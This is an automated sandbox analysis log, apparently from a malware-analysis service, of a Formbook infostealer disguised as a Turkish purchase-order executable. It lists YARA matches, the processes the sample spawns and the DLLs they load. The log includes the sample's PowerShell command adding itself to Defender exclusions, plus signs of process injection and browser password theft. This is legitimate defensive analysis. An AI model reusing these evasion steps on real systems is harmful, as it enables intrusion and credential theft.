            Source: C:\Windows\SysWOW64\fc.exeCode function: 9_2_02DBDAC69_2_02DBDAC6
            Source: C:\Windows\SysWOW64\fc.exeCode function: 9_2_02D55AA09_2_02D55AA0
            Source: C:\Windows\SysWOW64\fc.exeCode function: 9_2_02DADAAC9_2_02DADAAC
            Source: C:\Windows\SysWOW64\fc.exeCode function: 9_2_02DB1AA39_2_02DB1AA3
            Source: C:\Windows\SysWOW64\fc.exeCode function: 9_2_02DCFA499_2_02DCFA49
            Source: C:\Windows\SysWOW64\fc.exeCode function: 9_2_02DC7A469_2_02DC7A46
            Source: C:\Windows\SysWOW64\fc.exeCode function: 9_2_02D83A6C9_2_02D83A6C
            Source: C:\Windows\SysWOW64\fc.exeCode function: 9_2_02D85BF09_2_02D85BF0
            Source: C:\Windows\SysWOW64\fc.exeCode function: 9_2_02D4DBF99_2_02D4DBF9
            Source: C:\Windows\SysWOW64\fc.exeCode function: 9_2_02D2FB809_2_02D2FB80
            Source: C:\Windows\SysWOW64\fc.exeCode function: 9_2_02DCFB769_2_02DCFB76
            Source: C:\Windows\SysWOW64\fc.exeCode function: 9_2_02D138E09_2_02D138E0
            Source: C:\Windows\SysWOW64\fc.exeCode function: 9_2_02D7D8009_2_02D7D800
            Source: C:\Windows\SysWOW64\fc.exeCode function: 9_2_02D199509_2_02D19950
            Source: C:\Windows\SysWOW64\fc.exeCode function: 9_2_02D2B9509_2_02D2B950
            Source: C:\Windows\SysWOW64\fc.exeCode function: 9_2_02DA59109_2_02DA5910
            Source: C:\Windows\SysWOW64\fc.exeCode function: 9_2_02D19EB09_2_02D19EB0
            Source: C:\Windows\SysWOW64\fc.exeCode function: 9_2_02D11F929_2_02D11F92
            Source: C:\Windows\SysWOW64\fc.exeCode function: 9_2_02DCFFB19_2_02DCFFB1
            Source: C:\Windows\SysWOW64\fc.exeCode function: 9_2_02DCFF099_2_02DCFF09
            Source: C:\Windows\SysWOW64\fc.exeCode function: 9_2_02DCFCF29_2_02DCFCF2
            Source: C:\Windows\SysWOW64\fc.exeCode function: 9_2_02D89C329_2_02D89C32
            Source: C:\Windows\SysWOW64\fc.exeCode function: 9_2_02D2FDC09_2_02D2FDC0
            Source: C:\Windows\SysWOW64\fc.exeCode function: 9_2_02DC1D5A9_2_02DC1D5A
            Source: C:\Windows\SysWOW64\fc.exeCode function: 9_2_02D13D409_2_02D13D40
            Source: C:\Windows\SysWOW64\fc.exeCode function: 9_2_02DC7D739_2_02DC7D73
            Source: C:\Windows\SysWOW64\fc.exeCode function: 9_2_003A1A309_2_003A1A30
            Source: C:\Windows\SysWOW64\fc.exeCode function: 9_2_003BA5909_2_003BA590
            Source: C:\Windows\SysWOW64\fc.exeCode function: 9_2_0039CBD09_2_0039CBD0
            Source: C:\Windows\SysWOW64\fc.exeCode function: 9_2_0039CBC79_2_0039CBC7
            Source: C:\Windows\SysWOW64\fc.exeCode function: 9_2_0039CDF09_2_0039CDF0
            Source: C:\Windows\SysWOW64\fc.exeCode function: 9_2_0039AE709_2_0039AE70
            Source: C:\Windows\SysWOW64\fc.exeCode function: 9_2_0039AE669_2_0039AE66
            Source: C:\Windows\SysWOW64\fc.exeCode function: 9_2_003A357B9_2_003A357B
            Source: C:\Windows\SysWOW64\fc.exeCode function: 9_2_003A35809_2_003A3580
            Source: C:\Windows\SysWOW64\fc.exeCode function: 9_2_0302A1169_2_0302A116
            Source: C:\Windows\SysWOW64\fc.exeCode function: 9_2_0302BA249_2_0302BA24
            Source: C:\Windows\SysWOW64\fc.exeCode function: 9_2_0302B9049_2_0302B904
            Source: C:\Windows\SysWOW64\fc.exeCode function: 9_2_0302AE289_2_0302AE28
            Source: C:\Windows\SysWOW64\fc.exeCode function: 9_2_0302BDBC9_2_0302BDBC
            Source: C:\Windows\SysWOW64\fc.exeCode function: String function: 02D7EA12 appears 86 times
            Source: C:\Windows\SysWOW64\fc.exeCode function: String function: 02D57E54 appears 107 times
            Source: C:\Windows\SysWOW64\fc.exeCode function: String function: 02D45130 appears 58 times
            Source: C:\Windows\SysWOW64\fc.exeCode function: String function: 02CFB970 appears 262 times
            Source: C:\Windows\SysWOW64\fc.exeCode function: String function: 02D8F290 appears 103 times
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: String function: 01935130 appears 58 times
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: String function: 0196EA12 appears 86 times
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: String function: 01947E54 appears 107 times
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: String function: 0197F290 appears 103 times
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: String function: 018EB970 appears 262 times
            Source: 03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe, 00000000.00000002.1720342797.0000000007160000.00000004.08000000.00040000.00000000.sdmp, Binary or memory string: OriginalFilenameRT.dll. vs 03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe
            Source: 03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe, 00000000.00000002.1723792983.000000000D570000.00000004.08000000.00040000.00000000.sdmp, Binary or memory string: OriginalFilenameTyrone.dll8 vs 03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe
            Source: 03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe, 00000000.00000002.1685588395.0000000002CB1000.00000004.00000800.00020000.00000000.sdmp, Binary or memory string: OriginalFilenameRT.dll. vs 03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe
            Source: 03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe, 00000000.00000002.1684163629.0000000000D0E000.00000004.00000020.00020000.00000000.sdmp, Binary or memory string: OriginalFilenameclr.dllT vs 03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe
            Source: 03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe, 00000003.00000002.2136699590.00000000019ED000.00000040.00001000.00020000.00000000.sdmp, Binary or memory string: OriginalFilenamentdll.dllj% vs 03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe
            Source: 03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe, 00000003.00000002.2136436836.0000000001467000.00000004.00000020.00020000.00000000.sdmp, Binary or memory string: OriginalFilenameFC.EXEj% vs 03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe
            Source: 03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe, 00000003.00000002.2136436836.000000000147C000.00000004.00000020.00020000.00000000.sdmp, Binary or memory string: OriginalFilenameFC.EXEj% vs 03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe
            Source: 03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe, Binary or memory string: OriginalFilenamerZwD.exe> vs 03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe
            Source: 03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe, Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
            Source: 3.2.03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe.400000.0.raw.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 3.2.03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000009.00000002.4151312291.0000000000390000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000009.00000002.4152828319.0000000000B90000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000003.00000002.2136117245.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000003.00000002.2137792677.0000000001C10000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 0000000B.00000002.4154513255.00000000050C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000009.00000002.4152767044.0000000000B50000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000003.00000002.2137923561.0000000003A50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000008.00000002.4152697754.0000000004530000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: 0.2.03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe.d570000.7.raw.unpack, qCgbVWn8uxKFfceDdd.cs Security API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
            Source: 0.2.03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe.d570000.7.raw.unpack, qCgbVWn8uxKFfceDdd.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 0.2.03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe.d570000.7.raw.unpack, qCgbVWn8uxKFfceDdd.cs Security API names: _0020.AddAccessRule
            Source: 0.2.03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe.d570000.7.raw.unpack, fOm1m09TqPZZgHoxih.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 0.2.03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe.4a8cdb0.2.raw.unpack, qCgbVWn8uxKFfceDdd.cs Security API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
            Source: 0.2.03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe.4a8cdb0.2.raw.unpack, qCgbVWn8uxKFfceDdd.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 0.2.03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe.4a8cdb0.2.raw.unpack, qCgbVWn8uxKFfceDdd.cs Security API names: _0020.AddAccessRule
            Source: 0.2.03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe.49c5790.3.raw.unpack, fOm1m09TqPZZgHoxih.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 0.2.03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe.4a8cdb0.2.raw.unpack, fOm1m09TqPZZgHoxih.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 0.2.03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe.49c5790.3.raw.unpack, qCgbVWn8uxKFfceDdd.cs Security API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
            Source: 0.2.03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe.49c5790.3.raw.unpack, qCgbVWn8uxKFfceDdd.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 0.2.03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe.49c5790.3.raw.unpack, qCgbVWn8uxKFfceDdd.cs Security API names: _0020.AddAccessRule
            Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@10/7@15/11
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe.log
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Mutant created: NULL
            Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7688:120:WilError_03
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_csme5hsf.fwq.ps1
            Source: 03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe File read: C:\Users\user\Desktop\desktop.ini
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
            Source: fc.exe, 00000009.00000003.2333399576.00000000006A9000.00000004.00000020.00020000.00000000.sdmp, fc.exe, 00000009.00000003.2334194872.00000000006C9000.00000004.00000020.00020000.00000000.sdmp, fc.exe, 00000009.00000002.4151524691.00000000006C9000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
            Source: 03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe ReversingLabs: Detection: 34%
            Source: unknown Process created: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe "C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe"
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe"
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Process created: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe "C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe"
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Program Files (x86)\dBFhdyqBsdNrnrJAfNLOKXKaQnhKQJBcldNsIfNpUQtMCDpaQGBzTrWGWqXfCiiJiSX\akwoJPEqdiyPQmCnaGzo.exe Process created: C:\Windows\SysWOW64\fc.exe "C:\Windows\SysWOW64\fc.exe"
            Source: C:\Windows\SysWOW64\fc.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Section loaded: mscoree.dll
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Section loaded: apphelp.dll
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Section loaded: kernel.appcore.dll
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Section loaded: version.dll
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Section loaded: vcruntime140_clr0400.dll
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Section loaded: ucrtbase_clr0400.dll
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Section loaded: uxtheme.dll
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Section loaded: windows.storage.dll
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Section loaded: wldp.dll
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Section loaded: profapi.dll
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Section loaded: cryptsp.dll
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Section loaded: rsaenh.dll
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Section loaded: cryptbase.dll
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Section loaded: dwrite.dll
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Section loaded: amsi.dll
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Section loaded: userenv.dll
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Section loaded: msasn1.dll
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Section loaded: gpapi.dll
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Section loaded: windowscodecs.dll
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Section loaded: propsys.dll
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Section loaded: edputil.dll
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Section loaded: urlmon.dll
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Section loaded: iertutil.dll
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Section loaded: srvcli.dll
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Section loaded: netutils.dll
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Section loaded: windows.staterepositoryps.dll
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Section loaded: sspicli.dll
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Section loaded: wintypes.dll
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Section loaded: appresolver.dll
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Section loaded: bcp47langs.dll
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Section loaded: slc.dll
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Section loaded: sppc.dll
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Section loaded: onecorecommonproxystub.dll
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Section loaded: onecoreuapcommonproxystub.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: urlmon.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: iertutil.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wininet.dll
            Source: C:\Windows\SysWOW64\fc.exe Section loaded: ulib.dll
            Source: C:\Windows\SysWOW64\fc.exe Section loaded: wininet.dll
            Source: C:\Windows\SysWOW64\fc.exe Section loaded: kernel.appcore.dll
            Source: C:\Windows\SysWOW64\fc.exe Section loaded: uxtheme.dll
            Source: C:\Windows\SysWOW64\fc.exe Section loaded: ieframe.dll
            Source: C:\Windows\SysWOW64\fc.exe Section loaded: iertutil.dll
            Source: C:\Windows\SysWOW64\fc.exe Section loaded: netapi32.dll
            Source: C:\Windows\SysWOW64\fc.exe Section loaded: version.dll
            Source: C:\Windows\SysWOW64\fc.exe Section loaded: userenv.dll
            Source: C:\Windows\SysWOW64\fc.exe Section loaded: winhttp.dll
            Source: C:\Windows\SysWOW64\fc.exe Section loaded: wkscli.dll
            Source: C:\Windows\SysWOW64\fc.exe Section loaded: netutils.dll
            Source: C:\Windows\SysWOW64\fc.exe Section loaded: sspicli.dll
            Source: C:\Windows\SysWOW64\fc.exe Section loaded: windows.storage.dll
            Source: C:\Windows\SysWOW64\fc.exe Section loaded: wldp.dll
            Source: C:\Windows\SysWOW64\fc.exe Section loaded: profapi.dll
            Source: C:\Windows\SysWOW64\fc.exe Section loaded: secur32.dll
            Source: C:\Windows\SysWOW64\fc.exe Section loaded: mlang.dll
            Source: C:\Windows\SysWOW64\fc.exe Section loaded: propsys.dll
            Source: C:\Windows\SysWOW64\fc.exe Section loaded: winsqlite3.dll
            Source: C:\Windows\SysWOW64\fc.exe Section loaded: vaultcli.dll
            Source: C:\Windows\SysWOW64\fc.exe Section loaded: wintypes.dll
            Source: C:\Windows\SysWOW64\fc.exe Section loaded: dpapi.dll
            Source: C:\Windows\SysWOW64\fc.exe Section loaded: cryptbase.dll
            Source: C:\Program Files (x86)\dBFhdyqBsdNrnrJAfNLOKXKaQnhKQJBcldNsIfNpUQtMCDpaQGBzTrWGWqXfCiiJiSX\akwoJPEqdiyPQmCnaGzo.exe Section loaded: wininet.dll
            Source: C:\Program Files (x86)\dBFhdyqBsdNrnrJAfNLOKXKaQnhKQJBcldNsIfNpUQtMCDpaQGBzTrWGWqXfCiiJiSX\akwoJPEqdiyPQmCnaGzo.exe Section loaded: mswsock.dll
            Source: C:\Program Files (x86)\dBFhdyqBsdNrnrJAfNLOKXKaQnhKQJBcldNsIfNpUQtMCDpaQGBzTrWGWqXfCiiJiSX\akwoJPEqdiyPQmCnaGzo.exe Section loaded: dnsapi.dll
            Source: C:\Program Files (x86)\dBFhdyqBsdNrnrJAfNLOKXKaQnhKQJBcldNsIfNpUQtMCDpaQGBzTrWGWqXfCiiJiSX\akwoJPEqdiyPQmCnaGzo.exe Section loaded: iphlpapi.dll
